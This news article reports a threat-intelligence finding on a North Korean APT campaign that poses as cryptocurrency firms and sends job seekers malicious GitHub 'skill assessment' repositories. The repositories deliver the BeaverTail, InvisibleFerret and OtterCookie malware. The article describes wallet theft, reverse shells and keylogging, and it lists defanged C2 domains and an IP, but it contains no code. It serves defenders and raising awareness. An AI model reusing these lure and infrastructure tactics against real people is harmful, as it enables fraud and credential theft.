North Korean APT Hackers Pose as Companies to Spread Malware to Job Seekers

Silent Push Threat Analysts have uncovered a chilling new cyberattack campaign orchestrated by the North Korean Advanced Persistent Threat (APT) group known as Contagious Interview, also referred to as Famous Chollima, a subgroup of the notorious Lazarus group.

This state-sponsored entity has been implicated in numerous sophisticated cyber-espionage efforts targeting global industries, with a particular focus on the cryptocurrency sector.

Their latest operation involves masquerading as legitimate cryptocurrency consulting firms BlockNovas LLC, Angeloper Agency, and SoftGlide LLC to lure unsuspecting job seekers into a malicious trap.

By exploiting the trust associated with job applications, these threat actors distribute malware through deceptive “interview lures,” aiming to compromise personal and financial data.

Sophisticated Social Engineering Targets Cryptocurrency Industry

The technical prowess of this campaign is evident in the deployment of three distinct malware strains BeaverTail, InvisibleFerret, and OtterCookie each tailored for information theft and further payload delivery across Windows, Linux, and macOS systems.

BeaverTail, primarily a JavaScript-based malware, acts as an initial vector, often distributed through malicious GitHub repositories disguised as skill assessment tasks.

Once executed, it facilitates the download of InvisibleFerret, a multi-stage Python backdoor designed for persistence and data exfiltration.

This malware targets cryptocurrency wallet credentials by harvesting data from browser extensions like MetaMask and Coinbase Wallet, using sophisticated techniques to access stored passwords, credit card information, and keychain data.

InvisibleFerret also integrates reverse shell capabilities and keylogging functions, communicating with command-and-control (C2) servers such as lianxinxiao[.]com to upload stolen data and receive further instructions.

Malware Campaigns Leverage AI-Generated Personas and GitHub Repositories

The operational infrastructure behind this campaign is equally alarming, heavily utilizing platforms like GitHub, freelancer sites, and job listing portals to disseminate malicious payloads.

Silent Push researchers identified critical OPSEC failures, such as exposed dashboards on mail.blocknovas[.]com, which monitor domains linked to malware distribution, including angeloperonline[.]online and softglide[.]co.

Moreover, the use of AI-generated personas, created with tools like Remaker AI, enhances the deceptive authenticity of these fake companies.

Employee profiles on platforms like LinkedIn, often tied to fictitious identities such as Mehmet Demir (aka Bigrocks918), are crafted to build credibility, further ensnaring victims.

Infrastructure ties extend to DNS records and shared C2 IPs, with lianxinxiao[.]com resolving to 37.221.126.117, a persistent hub for malware staging since August 2024.

Adding to the complexity, the threat actors employ services like Astrill VPN and residential proxies to obscure their activities, making detection challenging.

Victim testimonies, documented on platforms like dev[.]to, reveal real-world impacts, including compromised MetaMask wallets after executing malicious code from BlockNovas’ GitHub repositories.

Silent Push’s analysis underscores the persistent social engineering tactics of North Korean APTs, urging defenders to scrutinize job offers from unknown entities and monitor for suspicious domains and IPs.

This campaign exemplifies the intersection of technical sophistication and psychological manipulation, highlighting the urgent need for heightened cybersecurity awareness in the cryptocurrency job market.

Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!